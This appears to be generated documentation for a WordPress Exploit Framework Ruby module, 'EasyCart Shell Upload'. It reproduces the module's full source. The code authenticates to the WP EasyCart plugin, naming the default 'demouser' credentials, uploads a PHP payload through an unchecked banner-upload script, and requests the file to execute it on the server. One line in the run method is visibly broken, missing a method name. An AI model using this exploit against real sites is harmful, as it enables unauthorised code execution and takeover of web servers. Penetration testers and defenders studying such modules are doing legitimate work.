Class: Wpxf::Exploit::EasyCartShellUpload

Inherits:
Module
  • Object
show all
Includes:
Wpxf, Net::HttpClient, WordPress::Login
Defined in:
lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb

Constant Summary

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeEasyCartShellUpload

Returns a new instance of EasyCartShellUpload.



8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
 
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 8

def initialize
  super

  update_info(
    name: 'EasyCart Shell Upload',
    desc: 'WordPress Shopping Cart (WP EasyCart) Plugin for WordPress '\
          'contains a flaw that allows a remote attacker to execute '\
          'arbitrary PHP code. This flaw exists because the '\
          '/inc/amfphp/administration/banneruploaderscript.php script does '\
          'not properly verify or sanitize user-uploaded files. By '\
          'uploading a .php file, the remote system will place the file in '\
          'a user-accessible path. Making a direct request to the uploaded '\
          'file will allow the attacker to execute the script with the '\
          'privileges of the web server.'\
          "\n"\
          'In versions <= 3.0.8 authentication can be done by using the '\
          'WordPress credentials of a user with any role. In later '\
          'versions, a valid EasyCart admin password will be required that '\
          'is in use by any admin user. A default installation of EasyCart '\
          'will setup a user called "demouser" with a preset password '\
          'of "demouser".',
    author: [
      'Kacper Szurek', # Vulnerability disclosure
      'rastating'      # WPXF module
    ],
    references: [
      ['WPVDB', '7745']
    ],
    date: 'Jan 08 2015'
  )

  register_options([
    StringOption.new(
      name: 'username',
      desc: 'The WordPress username to authenticate with (versions <= 3.0.8)'
    ),
    StringOption.new(
      name: 'password',
      desc: 'The WordPress password to authenticate with (versions <= 3.0.8)'
    ),
    StringOption.new(
      name: 'ec_password',
      desc: 'The EasyCart password to authenticate with (versions <= 3.0.18)'
    ),
    BooleanOption.new(
      name: 'ec_password_is_hash',
      desc: 'Whether or not ec_password is an MD5 hash',
      default: false
    )
  ])
end

Instance Method Details

#checkObject 



92
93
94
 
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 92

def check
  check_plugin_version_from_readme('wp-easycart', '3.0.19')
end

#ec_passwordObject 



68
69
70
 
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 68

def ec_password
  normalized_option_value('ec_password')
end

#ec_password_is_hashObject 



72
73
74
 
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 72

def ec_password_is_hash
  normalized_option_value('ec_password_is_hash')
end

#passwordObject 



64
65
66
 
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 64

def password
  normalized_option_value('password')
end

#payload_body_builder(date_hash, payload_name, include_req_id) ⇒ Object 



104
105
106
107
108
109
110
 
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 104

def payload_body_builder(date_hash, payload_name, include_req_id)
  builder = Utility::BodyBuilder.new
  builder.add_field('datemd5', date_hash)
  builder.add_file_from_string('Filedata', payload.encoded, payload_name)
  builder.add_field('reqID', req_id) if include_req_id
  builder
end

#plugin_urlObject 



96
97
98
 
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 96

def plugin_url
  normalize_uri(wordpress_url_plugins, 'wp-easycart')
end

#req_idObject 



84
85
86
87
88
89
90
 
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 84

def req_id
  if ec_password_is_hash
    return ec_password
  else
    return Utility::Text.md5(ec_password)
  end
end

#runObject 



112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
 
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 112

def run
  return false unless super

  if !use_wordpress_authentication && !use_ec_authentication
    emit_error 'You must set either the username and password options or '\
               'specify an ec_password value'
    return false
  end

  if use_wordpress_authentication && use_ec_authentication
    emit_info 'Both EasyCart and WordPress credentials were supplied, '\
              'attempting WordPress first...'
  end

  if use_wordpress_authentication
    emit_info "Authenticating using #{username}:#{password}..."
    cookie = (username, password)

    if !cookie
      if use_ec_authentication
        emit_warning 'Failed to authenticate with WordPress, attempting '\
                     'upload with EC password next...'
      else
        emit_error 'Failed to authenticate with WordPress'
        return false
      end
    else
      emit_success 'Authenticated with WordPress', true
    end
  end

  emit_info 'Preparing payload...'
  payload_name = Utility::Text.rand_alpha(10)
  date_hash = Utility::Text.md5(Time.now.to_s)
  uploaded_filename = "#{payload_name}_#{date_hash}.php"
  payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
  builder = payload_body_builder(
    date_hash,
    "#{payload_name}.php",
    use_ec_authentication
  )

  emit_info 'Uploading payload...'
  res = nil
  builder.create do |body|
    res = execute_post_request(url: uploader_url, body: body, cookie: cookie)
  end

  if res.nil? || res.code != 200
    emit_error 'Failed to upload payload'
    emit_error "Server responded with code #{res.code}", true
    return false
  end

  emit_info 'Executing the payload...'
  res = execute_get_request(url: payload_url)
  if res && res.code == 200 && !res.body.strip.empty?
    emit_success "Result: #{res.body}"
  end

  true
end

#uploader_urlObject 



100
101
102
 
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 100

def uploader_url
  normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
end

#use_ec_authenticationObject 



80
81
82
 
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 80

def use_ec_authentication
  ec_password.to_s != ''
end

#use_wordpress_authenticationObject 



76
77
78
 
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 76

def use_wordpress_authentication
  username.to_s != '' && password.to_s != ''
end

#usernameObject 



60
61
62
 
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 60

def username
  normalized_option_value('username')
end